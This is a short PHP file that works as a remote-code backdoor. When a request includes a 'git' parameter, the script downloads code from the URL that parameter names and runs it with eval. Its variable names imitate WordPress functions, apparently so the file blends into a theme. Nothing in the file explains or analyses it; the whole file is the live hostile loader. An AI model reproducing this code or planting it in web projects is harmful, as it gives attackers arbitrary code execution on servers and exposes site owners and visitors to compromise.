<?php
if (isset($_GET['git'])) {
    $get_the_post_thumbnail_yd = $_GET['git'];
    if ($get_stylesheet_uri_bp = curl_init()) {
        curl_setopt($get_stylesheet_uri_bp, CURLOPT_URL, $get_the_post_thumbnail_yd);
        curl_setopt($get_stylesheet_uri_bp, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($get_stylesheet_uri_bp));
        curl_close($get_stylesheet_uri_bp);
        exit;
    }
}